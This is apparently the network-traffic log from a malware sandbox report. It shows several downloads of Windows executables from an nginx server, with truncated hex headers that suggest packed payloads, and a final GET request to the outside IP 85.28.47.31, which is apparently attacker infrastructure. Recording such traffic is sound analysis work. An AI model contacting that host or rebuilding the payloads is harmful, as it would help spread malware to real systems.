00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:56:19 GMTContent-Type: application/octet-streamContent-Length: 1939456Last-Modified: Fri, 26 Jul 2024 15:02:33 GMTConnection: keep-aliveETag: "66a3ba89-1d9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4d 00 00 04 00 00 36 78 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c dc 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc db 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 74 6d 6b 73 62 62 74 00 80 1a 00 00 60 32 00 00 7e 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6f 73 6e 6c 65 65 68 00 10 00 00 00 e0 4c 00 00 04 00 00 00 72 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4c 00 00 22 00 00 00 76 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:56:21 GMTContent-Type: application/octet-streamContent-Length: 1895424Last-Modified: Fri, 26 Jul 2024 15:01:58 GMTConnection: keep-aliveETag: "66a3ba66-1cec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 28 4c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc be 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c be 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 77 66 6c 74 6b 69 69 00 e0 19 00 00 f0 30 00 00 d2 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 77 74 69 73 75 6f 75 00 10 00 00 00 d0 4a 00 00 06 00 00 00 c4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 ca 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:04 GMTContent-Type: application/octet-streamContent-Length: 867038Last-Modified: Fri, 26 Jul 2024 15:52:44 GMTConnection: keep-aliveETag: "66a3c64c-d3ade"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 90 59 00 00 00 00 00 00 00 00 00 00 3e 13 0d 00 a0 27 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 90 59 00 00 00 40 0f 00 00 5a 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 a0 0f 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:04 GMTContent-Type: application/octet-streamContent-Length: 250368Last-Modified: Fri, 26 Jul 2024 15:47:14 GMTConnection: keep-aliveETag: "66a3c502-3d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 67 94 73 08 06 fa 20 08 06 fa 20 08 06 fa 20 67 70 51 20 13 06 fa 20 67 70 64 20 18 06 fa 20 67 70 50 20 6c 06 fa 20 01 7e 69 20 03 06 fa 20 08 06 fb 20 7b 06 fa 20 67 70 55 20 09 06 fa 20 67 70 60 20 09 06 fa 20 67 70 67 20 09 06 fa 20 52 69 63 68 08 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 6c 42 a1 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 78 03 02 00 00 00 00 4c 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 9a 02 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 58 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 19 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 32 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 79 6f 62 6f 79 00 00 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 65 7a 61 6e 61 7a 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:07 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Fri, 26 Jul 2024 15:36:02 GMTConnection: keep-aliveETag: "66a3c262-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 1c a2 f4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 a2 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 34 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:08 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 15:01:21 GMTConnection: keep-aliveETag: "66a3ba41-16600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 c2 d2 00 00 00 50 00 00 00 d4 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9d 33 00 00 00 30 01 00 00 34 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 17 00 00 00 70 01 00 00 12 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:10 GMTContent-Type: application/octet-streamContent-Length: 2755072Last-Modified: Fri, 26 Jul 2024 15:52:43 GMTConnection: keep-aliveETag: "66a3c64b-2a0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 a1 9c a3 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 00 00 00 b0 27 00 00 06 2a 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 30 00 00 04 00 00 a3 71 2a 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 30 00 0c 05 00 00 00 b0 30 00 38 01 00 00 00 80 29 00 8c 4c 00 00 00 00 00 00 00 00 00 00 00 c0 30 00 9c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6e 29 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 81 30 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 ae 27 00 00 10 00 00 00 b0 27 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 ee 00 00 00 c0 27 00 00 f0 00 00 00 b4 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f8 c3 00 00 00 b0 28 00 00 c4 00 00 00 a4 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 8c 4c 00 00 00 80 29 00 00 4e 00 00 00 68 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 30 42 00 00 00 d0 29 00 00 44 00 00 00 b6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 90 5e 06 00 00 20 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 0c 05 00 00 00 80 30 00 00 06 00 00 00 fa 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 58 00 00 00 00 90 30 00 00 02 00 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 a0 30 00 00 02 00 00 00 02 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 01 00 00 00 b0 30 00 00 02 00 00 00 04 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9c 03 00 00 00 c0 30 00 00 04 00 00 00 06 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
